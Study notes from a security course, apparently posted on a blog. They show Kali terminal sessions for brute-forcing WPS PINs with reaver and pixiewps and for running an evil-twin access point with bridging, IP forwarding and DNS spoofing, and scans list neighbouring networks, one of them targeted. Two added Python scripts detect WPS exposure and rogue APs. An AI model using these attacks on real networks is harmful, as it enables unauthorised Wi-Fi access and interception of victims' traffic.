Aqniu (安全牛) Study Notes: WPS and Other Tools
root@kali:~# service network-manager stop
root@kali:~# airmon-ng check kill
Killing these processes:
PID Name
765 dhclient
988 wpa_supplicant
Type the two commands above first, then map the wireless adapter into the virtual machine; remember this order.
root@kali:~# ifconfig // the adapter is not shown
root@kali:~# ifconfig -a // you must run ifconfig -a to see the adapter
root@kali:~# airmon-ng start wlan2
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1672 avahi-daemon
1673 avahi-daemon
PHY Interface Driver Chipset
phy0 wlan2 ath9k_htc Atheros Communications, Inc. AR9271 802.11
(mac80211 monitor mode vif enabled for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)
root@kali:~# iwconfig
eth0 no wireless extensions.
wlan2mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
root@kali:~# wash
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --output-piped Allows Wash output to be piped. Example. wash x|y|z...
-g, --get-chipset Pipes output and runs reaver alongside to get chipset
-h, --help Show help
Example:
wash -i mon0
root@kali:~# wash -i wlan2mon
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
BSSID Channel RSSI WPS Version WPS Locked ESSID
------------------------------------------------------------------------------------------------
D0:C7:C0:99:ED:3A 1 00 1.0 No ziroom222
0C:82:68:5E:76:20 1 00 1.0 No letv
14:75:90:21:4F:56 6 00 1.0 No TP-LINK_4F56
5C:63:BF:F9:74:0C 6 00 1.0 No TP-DO3234
root@kali:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv -K 1
root@kali:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv // starts the 11,000-PIN attempt
root@kali:~# pixiewps
Pixiewps 1.1 WPS pixie dust attack tool
Copyright (c) 2015, wiire <[email protected]>
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee Hash1
-z, --e-hash2 : Enrollee Hash2
-a, --authkey : Authentication session key
Optional Arguments:
-n, --e-nonce : Enrollee nonce (mode 2,3,4)
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-f, --force : Bruteforce the whole keyspace (mode 4) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
-h, --help : Display this usage screen
Examples:
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
[!] Not all required arguments have been supplied!
root@kali:~# pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
root@kali:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from 00:90:4C:C1:AC:21
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.
root@kali:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -p 52737488 -c 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.
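As an added defender's check (not part of the original notes): a Python script that reads the table wash prints and lists which of the APs you administer still have WPS enabled, so they can be switched off. The wash rows and the managed-BSSID set below are constructed samples.

```python
"""Inventory which managed APs still expose WPS, from `wash` survey output.
Added example; the wash rows and the MANAGED inventory are constructed.
"""
import re

WASH_OUTPUT = """\
BSSID               Channel  RSSI  WPS Version  WPS Locked  ESSID
------------------------------------------------------------------
D0:C7:C0:99:ED:3A   1        00    1.0          No          ziroom222
0C:82:68:5E:76:20   1        00    1.0          No          letv
14:75:90:21:4F:56   6        00    1.0          Yes         TP-LINK_4F56
AA:BB:CC:DD:EE:01   11       -60   2.0          No          corp-guest
"""
MANAGED = {"14:75:90:21:4F:56", "AA:BB:CC:DD:EE:01"}  # APs we administer

ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+(?P<ch>\d+)\s+(?P<rssi>-?\d+)"
    r"\s+(?P<ver>\d\.\d)\s+(?P<locked>Yes|No)\s+(?P<essid>.*)$"
)

def parse_wash(text):
    """Yield one dict per AP row; header and separator lines are skipped."""
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            yield m.groupdict()

def wps_findings(text, managed):
    """Return (bssid, essid, severity, advice) for managed APs with WPS on.
    'Locked' means the AP has tripped its PIN lockout (rate limiting works),
    but WPS is still enabled; unlocked APs are the ones to fix first.
    """
    findings = []
    for ap in parse_wash(text):
        if ap["bssid"] not in managed:
            continue  # neighbouring networks are not ours to reconfigure
        if ap["locked"] == "Yes":
            findings.append((ap["bssid"], ap["essid"], "medium",
                             "lockout active; still disable WPS on the AP"))
        else:
            findings.append((ap["bssid"], ap["essid"], "high",
                             "WPS enabled and unlocked; disable WPS now"))
    return findings

if __name__ == "__main__":
    for bssid, essid, sev, advice in wps_findings(WASH_OUTPUT, MANAGED):
        print(bssid, essid, sev, advice)
```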
Other tools: EVIL TWIN AP / ROGUE AP
WPS (WIRELESS PROTECTED SETUP): freeloading on Wi-Fi, and being freeloaded on. In Beijing, Shanghai and Guangzhou, 20% of the wireless networks in public places are fake.
Commands from the course slide:
airbase-ng -a <AP mac> --essid "kifi" -c 11 wlan2mon
apt-get install bridge-utils // install the bridge utilities
brctl addbr bridge
brctl addif bridge eth0
brctl addif bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig bridge 192.168.1.10 up
route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1
root@kali:~# airodump-ng wlan2mon
CH 1][ Elapsed: 3 mins ][ 2015-11-18 21:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:75:90:21:4F:56 -47 114 5 0 6 54e. WPA2 CCMP PSK TP-LINK_4F56
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e. WPA2 TKIP MGT kifi
08:10:79:2A:29:7A -65 137 0 0 6 54e. WPA2 CCMP PSK 2-1-403
D0:C7:C0:99:ED:3A -69 94 8 0 1 54e WPA2 CCMP PSK ziroom222
E0:06:E6:39:C3:0C -76 90 0 0 6 54e. WPA2 CCMP PSK lizhi2012
5C:63:BF:F9:74:0C -79 99 0 0 6 54e. WPA2 CCMP PSK TP-D03234
BC:D1:77:C0:87:DE -86 56 0 0 11 54e WPA2 CCMP PSK MERCURY_C087DE
50:BD:5F:C0:F6:D6 -85 46 0 0 11 54e. WPA2 CCMP PSK MasterHuang
BC:14:EF:A1:97:29 -84 46 0 0 1 54e WPA2 CCMP PSK gehua01141406060486797
00:1E:58:OA:26:B2 -88 39 0 0 6 54e. WPA2 CCMP PSK dlink
EC:26:CA:3D:9C:ED -90 12 0 0 1 54e. WPA2 CCMP PSK YW170
80:89:17:15:86:28 -90 9 0 0 11 54e. WPA2 CCMP PSK TP-D03235
C8:3A:35:2A:D6:A8 -91 7 0 0 6 54e WPA2 CCMP PSK nayunhao
BSSID STATION PWR Rate Lost Frames Probe
14:75:90:21:4F:56 E8:3E:B6:1B:19:32 -64 0 -l1e 0 1
14:75:90:21:4F:56 90:3C:92:BA:00:CC -77 0G-11 0 7
14:75:90:21:4F:56 18:DC:56:F0:26:9F -84 0 -1 0 1
root@kali:~# airbase-ng -c 11 --essid kifi-free wlan2mon // spoof the wifi-free wireless network
21:12:36 Created tap interface at0
12:12:36 Trying to set MTU on at0 to 1500
12:12:36 Trying to set MTU on wlan2mon to 1800
21:12:37 Access Point with BSSID 08:57:00:0C:96 started
root@kali:~# ifconfig -a // the spoofed interface at0 has appeared
root@kali:~# airodump-ng wlan2mon // listen again: the wifi-free wireless network has appeared
CH 1][ Elapsed: 3 mins ][ 2015-11-18 21:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1E:58:OA:26:B2 -88 39 0 0 6 54e. WPA2 CCMP PSK dlink
C8:3A:35:2A:D6:A8 -91 7 0 0 6 54e WPA2 CCMP PSK nayunhao
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e OPN
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e. WPA2 TKIP MGT kifi
14:75:90:21:4F:56 -47 114 5 0 6 54e. WPA2 CCMP PSK TP-LINK_4F56
08:10:79:2A:29:7A -65 137 0 0 6 54e. WPA2 CCMP PSK 2-1-403
D0:C7:C0:99:ED:3A -69 94 8 0 1 54e WPA2 CCMP PSK ziroom222
5C:63:BF:F9:74:0C -79 99 0 0 6 54e. WPA2 CCMP PSK TP-D03234
E0:06:E6:39:C3:0C -76 90 0 0 6 54e. WPA2 CCMP PSK lizhi2012
BC:14:EF:A1:97:29 -84 46 0 0 1 54e WPA2 CCMP PSK gehua01141406060486797
BC:D1:77:C0:87:DE -86 56 0 0 11 54e WPA2 CCMP PSK MERCURY_C087DE
50:BD:5F:C0:F6:D6 -85 46 0 0 11 54e. WPA2 CCMP PSK MasterHuang
EC:26:CA:3D:9C:ED -90 12 0 0 1 54e. WPA2 CCMP PSK YW170
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 64:09:80:24:A2:C9 -93 0 - 1 0 3 leon
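An added example (not from the original notes) that turns the airodump-ng listing above into a rogue-AP check: it parses constructed rows in that format and compares them with a constructed baseline of the networks a site owns, flagging the three patterns a spoofed access point produces.

```python
"""Spot a rogue or evil-twin AP in airodump-ng output.
Added example; AIRODUMP rows and BASELINE are constructed. It flags an owned
ESSID served by a foreign BSSID, one BSSID beaconing two security profiles,
and an open network named like an owned one (kifi-free next to kifi).
"""
import re

AIRODUMP = """\
EC:26:CA:DC:29:B6  -32  190  0  0  11  54e   OPN
EC:26:CA:DC:29:B6  -32  190  0  0  11  54e.  WPA2  TKIP  MGT  kifi
14:75:90:21:4F:56  -47  114  5  0  6   54e.  WPA2  CCMP  PSK  TP-LINK_4F56
08:57:00:0C:96:01  -30  80   0  0  11  54e   OPN   kifi-free
AA:BB:CC:DD:EE:02  -35  60   0  0  11  54e.  WPA2  CCMP  PSK  kifi
"""
BASELINE = {"kifi": ("EC:26:CA:DC:29:B6", "WPA2"),
            "TP-LINK_4F56": ("14:75:90:21:4F:56", "WPA2")}
# BSSID, six numeric/rate columns, ENC; whatever follows is CIPHER AUTH ESSID.
ROW = re.compile(r"^(?P<bssid>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+(?:\S+\s+){6}"
                 r"(?P<enc>OPN|WEP|WPA2?)\s*(?P<rest>.*)$")

def parse_airodump(text):
    """Return [{'bssid', 'enc', 'essid'}] for each AP row in the table."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        rest = m.group("rest").split()
        # Open networks print no cipher/auth, so the remainder is the ESSID.
        essid = " ".join(rest if m.group("enc") == "OPN" else rest[2:])
        rows.append({"bssid": m.group("bssid"), "enc": m.group("enc"), "essid": essid})
    return rows

def rogue_findings(rows, baseline):
    """Return (kind, bssid, detail) tuples that deserve a second look."""
    findings, profiles = [], {}
    for r in rows:
        profiles.setdefault(r["bssid"], set()).add(r["enc"])
        essid = r["essid"]
        if essid in baseline and r["bssid"] != baseline[essid][0]:
            findings.append(("IMPERSONATION", r["bssid"], essid))
        elif r["enc"] == "OPN" and essid and any(
                k.lower() in essid.lower() for k in baseline):
            findings.append(("LOOKALIKE_OPEN", r["bssid"], essid))
    for bssid, encs in profiles.items():
        if len(encs) > 1:  # e.g. OPN and WPA2 beacons from the same BSSID
            findings.append(("CONFLICTING_PROFILE", bssid, "/".join(sorted(encs))))
    return findings
```

Calling rogue_findings(parse_airodump(AIRODUMP), BASELINE) returns one tuple each for the open lookalike, the impersonating BSSID and the BSSID with conflicting profiles.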
root@kali:~# apt-get install bridge-utils // install the bridge utilities
root@kali:~# brctl
Usage: brctl [commands]
commands:
addbr <bridge> add bridge
delbr <bridge> delete bridge
addif <bridge> <device> add interface to bridge
delif <bridge> <device> delete interface from bridge
hairpin <bridge> <port> {on|off} turn hairpin on/off
setageing <bridge> <time> set ageing time
setbridgeprio <bridge> <prio> set bridge priority
setfd <bridge> <time> set bridge forward delay
sethello <bridge> <time> set hello time
setmaxage <bridge> <time> set max message age
setpathcost <bridge> <port> <cost> set path cost
setportprio <bridge> <port> <prio> set port priority
show [ <bridge> ] show a list of bridges
showmacs <bridge> show a list of mac addrs
showstp <bridge> show bridge stp info
stp <bridge> {on|off} turn stp on/off
root@kali:~# brctl addbr bridge
root@kali:~# brctl addif bridge eth0
root@kali:~# dhclient eth0
Job for smbd.service failed. See 'systemctl status smbd.service' and 'journalctl -xn' for details.
invoke-rc.d: initscript smbd, action "reload" failed.
root@kali:~# brctl addif bridge eth0
root@kali:~# brctl addif bridge at0
root@kali:~# ifconfig eth0 0.0.0.0 up
root@kali:~# ifconfig at0 0.0.0.0 up
root@kali:~# netstat -ar
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
root@kali:~# route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.1.1.1
root@kali:~# netstat -ar
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
10.0.0.0 10.1.1.1 255.0.0.0 U 0 0 0 bridge
WPS (WIRELESS PROTECTED SETUP)
Commands from the course slide:
echo 1 > /proc/sys/net/ipv4/ip_forward
dnsspoof -i bridge -f dnsspoof.hosts
/usr/share/dsniff/dnsspoof.hosts
apache2ctl start
root@kali:~# vi /proc/sys/net/ipv4/ip_forward
It will not let you modify the data!
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Change the 0 to 1 and the routing (forwarding) function is enabled!
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
root@kali:~# dnsspoof -i bridge -f dnsspoof.hosts
root@kali:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root@kali:~# cat /usr/share/dsniff/dnsspoof.hosts
root@kali:~# vi host
root@kali:~# dnsspoof -i bridge -f host
dnsspoof: listening on bridge [udp dst port 53 and not src 10.1.1.101]
root@kali:~# apache
apache2 apache2ctl apachectl apache-users
root@kali:~# apache2ctl start
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message
root@kali:~# netstat -pantu | grep :80
tcp6 0 0 :::80 :::* LISTEN 2941/apache2
These notes are student notes from Aqniu Classroom (安全牛课堂); to see this course or other information-security material, go to Aqniu Classroom.
This article is from the "11662938" blog; please keep this source: http://11672938.blog.51cto.com/11662938/1967657